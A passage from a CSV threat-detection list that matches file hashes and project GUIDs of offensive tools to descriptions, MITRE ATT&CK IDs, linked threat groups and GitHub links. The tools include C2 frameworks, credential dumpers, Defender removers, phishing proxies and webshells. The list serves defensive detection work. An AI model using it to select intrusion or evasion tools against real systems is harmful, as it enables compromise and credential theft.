Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","34997" "*b8480a3711130c5b2b71a873611a66a48edcadadbdb3309577d7aa943fa2a1e6*",".{0,1000}b8480a3711130c5b2b71a873611a66a48edcadadbdb3309577d7aa943fa2a1e6.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34998" "*B84EFDD8-CEA0-4CCA-B7B8-3F8AB3A336B4*",".{0,1000}B84EFDD8\-CEA0\-4CCA\-B7B8\-3F8AB3A336B4.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","34999" "*b85083493e392d40d01bec390adba7e862fef08f3624839bbd9aa4f1b049fffc*",".{0,1000}b85083493e392d40d01bec390adba7e862fef08f3624839bbd9aa4f1b049fffc.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35000" "*b8531483419f4819584b69edee3089b86bab98a1c39d3058074499d76939cff5*",".{0,1000}b8531483419f4819584b69edee3089b86bab98a1c39d3058074499d76939cff5.{0,1000}","offensive_tool_keyword","Moriarty","Moriarty is designed to enumerate missing KBs - detect various 
vulnerabilities and suggest potential exploits for Privilege Escalation in Windows environments.","T1068 - T1083","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/BC-SECURITY/Moriarty","1","0","#filehash","N/A","7","6","510","67","2024-08-07T15:06:31Z","2023-12-11T14:15:33Z","35001" "*b85ba959ef3133cc86ae808e0e8f58af054f00cc96b34ef6973f3942ee80d056*",".{0,1000}b85ba959ef3133cc86ae808e0e8f58af054f00cc96b34ef6973f3942ee80d056.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35003" "*b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7*",".{0,1000}b872e0bbe252aa4e33492453232f6320b8d35b536db2efbf9d50a1d4e5de14d7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35007" "*b875051a6d584b37810ea48923af45e20d1367adfa94266bfe47a1a35d76b03a*",".{0,1000}b875051a6d584b37810ea48923af45e20d1367adfa94266bfe47a1a35d76b03a.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","35008" 
"*B87A5373-750C-44A7-BCEC-32185A3077AC*",".{0,1000}B87A5373\-750C\-44A7\-BCEC\-32185A3077AC.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35009" "*b87c2a25945a735f4550eba7155c5e363e0406b7930b7205c762540ac672a097*",".{0,1000}b87c2a25945a735f4550eba7155c5e363e0406b7930b7205c762540ac672a097.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","35010" "*b88377088eef28045877c620f1a713356ce155885a61b073d3f4569675bda0e7*",".{0,1000}b88377088eef28045877c620f1a713356ce155885a61b073d3f4569675bda0e7.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","35011" "*b8860da17ef3184d74987dd804109669ab503b2faa70438b8072f27b24f6c00a*",".{0,1000}b8860da17ef3184d74987dd804109669ab503b2faa70438b8072f27b24f6c00a.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","35013" "*b887e2c6fbc2358ddae1a0b5335292faabaf628941a19b018230c0a5195201a0*",".{0,1000}b887e2c6fbc2358ddae1a0b5335292faabaf628941a19b018230c0a5195201a0.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","35015" "*B88B65D3-2689-4E39-892C-7532087174CB*",".{0,1000}B88B65D3\-2689\-4E39\-892C\-7532087174CB.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#GUIDproject","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","35016" "*b88da2e2ea72952817c28091798efa4c08bed068b6c399799627d89a74968e81*",".{0,1000}b88da2e2ea72952817c28091798efa4c08bed068b6c399799627d89a74968e81.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35017" "*b88e406cbf20a830e357e89a3e3aa4210829777d43a5fb11d46e38a4220f4d9a*",".{0,1000}b88e406cbf20a830e357e89a3e3aa4210829777d43a5fb11d46e38a4220f4d9a.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational 
awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","35018" "*b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8*",".{0,1000}b8939f328f43eafc2faa8ba8532a756eb9db47e00e947ad8543484b4b0958bb8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35019" "*b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c*",".{0,1000}b89570294bb08b6ac4245fe0db6e35c1b23fa01ad3a9ac0bfe07043c7af3350c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35020" "*b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1*",".{0,1000}b898e52e3799d4c3c4fa328c400ba620c814c11ca23d0b7ec2f3fd7917a7e8a1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor 
authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","35021" "*b89f0a3b10b8b73f873fec267286a6c006220ea2a7163052b25cb130cf38086d*",".{0,1000}b89f0a3b10b8b73f873fec267286a6c006220ea2a7163052b25cb130cf38086d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35022" "*b8a1f340423a7c8c32c364c61208b094fbd4ba05aee0dacb8d9d04584334dfc7*",".{0,1000}b8a1f340423a7c8c32c364c61208b094fbd4ba05aee0dacb8d9d04584334dfc7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35024" "*b8a902ac3876c007c2e9ccef7a508430b5a8cc6dbcbf9794861bb8f62c82f064*",".{0,1000}b8a902ac3876c007c2e9ccef7a508430b5a8cc6dbcbf9794861bb8f62c82f064.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35026" "*b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235*","b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation 
tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","35027" "*b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46*",".{0,1000}b8ae91971edca5937251c1f9a09ca5eb2c48a98ef4a80187394f2c037bbefb46.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35028" "*B8AEE3F1-0642-443C-B42C-33BADCD42365*",".{0,1000}B8AEE3F1\-0642\-443C\-B42C\-33BADCD42365.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","#GUIDproject","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","35029" "*b8b0e6a5452420520359221d8f527a35ec6b4da45f55179a1ffd5b820d1c35dc*",".{0,1000}b8b0e6a5452420520359221d8f527a35ec6b4da45f55179a1ffd5b820d1c35dc.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","35030" 
"*b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25*",".{0,1000}b8c9caeda6743d224835019b8bdc0105ad54f9a804a33e7e51acb605a8e8bc25.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","#filehash","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","35033" "*b8ca777d50193a7734680db80690c6106076a9b5b279300a6a52bae8564dad2f*",".{0,1000}b8ca777d50193a7734680db80690c6106076a9b5b279300a6a52bae8564dad2f.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","35034" "*b8d9531ece7787f90d6b6bd5bf28e910d28bf3a5d6bb3deb0d0719cc01d2754b*",".{0,1000}b8d9531ece7787f90d6b6bd5bf28e910d28bf3a5d6bb3deb0d0719cc01d2754b.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35035" "*b8e498773afbb4d216be790053b45824bb4c884cb96fbe486209418251d9f737*",".{0,1000}b8e498773afbb4d216be790053b45824bb4c884cb96fbe486209418251d9f737.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - 
Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35038" "*b8eb020a2cbb47146669cfe31c64bb2e7d6499d049c493d6418b9716f5c74583*",".{0,1000}b8eb020a2cbb47146669cfe31c64bb2e7d6499d049c493d6418b9716f5c74583.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","35040" "*b8f44b3631dcc6e055b710d873486f3b3385ea06f38d160a7f6da2d7e6c809c3*",".{0,1000}b8f44b3631dcc6e055b710d873486f3b3385ea06f38d160a7f6da2d7e6c809c3.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","35041" 
"*b8f5ed1345cb6970bd21babe5a58d45e035a9ecd04b961b995b2a03023beea87*",".{0,1000}b8f5ed1345cb6970bd21babe5a58d45e035a9ecd04b961b995b2a03023beea87.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#filehash","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","35042" "*b8f82558b584911473782894f452d3807367b378e8fd1e5be7956e53c4baf1dc*",".{0,1000}b8f82558b584911473782894f452d3807367b378e8fd1e5be7956e53c4baf1dc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","35043" "*b8fd450e16610f3cc307e7b1b3309ad4e79456860ec16dec1006250b8afe49b2*",".{0,1000}b8fd450e16610f3cc307e7b1b3309ad4e79456860ec16dec1006250b8afe49b2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35044" "*B8FF9629-B4CE-4871-A2CD-8E6D73F6DF9E*",".{0,1000}B8FF9629\-B4CE\-4871\-A2CD\-8E6D73F6DF9E.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35045" 
"*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","35046" "*b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7*",".{0,1000}b90d7a75d6c85314b6232306f73ee17783f5b00882f264381ad3a9f4c2bedfa7.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#filehash","N/A","10","2","162","45","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z","35047" "*b91166d5623d4077003ae8527e9169092994f5c189c8a3820b32e204b4230578*",".{0,1000}b91166d5623d4077003ae8527e9169092994f5c189c8a3820b32e204b4230578.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","0","#filehash","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","35048" "*b91e1b481db19677207c0175a5296fbd769bf9f18bd24837f04d48e417c5e8a4*",".{0,1000}b91e1b481db19677207c0175a5296fbd769bf9f18bd24837f04d48e417c5e8a4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35049" "*b92299d248537a4d1adaaf7bccfed772d2d5a0966a886ff66718280f9abba372*",".{0,1000}b92299d248537a4d1adaaf7bccfed772d2d5a0966a886ff66718280f9abba372.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35051" "*b923736184bba7b4588e1d53759912b2c89293387a1d9df7938626d475fb9c6b*",".{0,1000}b923736184bba7b4588e1d53759912b2c89293387a1d9df7938626d475fb9c6b.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35052" "*b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096*",".{0,1000}b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35053" "*b92a810f34ccdcaf783067a0534be97ee2f51561ce8a07a948c887edb234dda4*",".{0,1000}b92a810f34ccdcaf783067a0534be97ee2f51561ce8a07a948c887edb234dda4.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#filehash","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","35054" "*B92B6B67-C7C8-4548-85EE-A215D74C000D*",".{0,1000}B92B6B67\-C7C8\-4548\-85EE\-A215D74C000D.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#GUIDproject","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","35055" "*b936913f0aef2efd1184619af801739258328dd3118d8693dd02811aa6ac16cb*",".{0,1000}b936913f0aef2efd1184619af801739258328dd3118d8693dd02811aa6ac16cb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35057" "*b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9*",".{0,1000}b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users 
behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","35058" "*b93d9656d13b3867ba6e27f6bf529d394558e9b555d7564664d50f63cc361864*",".{0,1000}b93d9656d13b3867ba6e27f6bf529d394558e9b555d7564664d50f63cc361864.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35059" "*b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443*",".{0,1000}b94466ebb0aa74a4b4b35da803416e130db2826ee1d0b4191f88c8d602cf4443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35061" "*B948E25D061039D64115CFDE74D2FF4372E83765*",".{0,1000}B948E25D061039D64115CFDE74D2FF4372E83765.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","35063" 
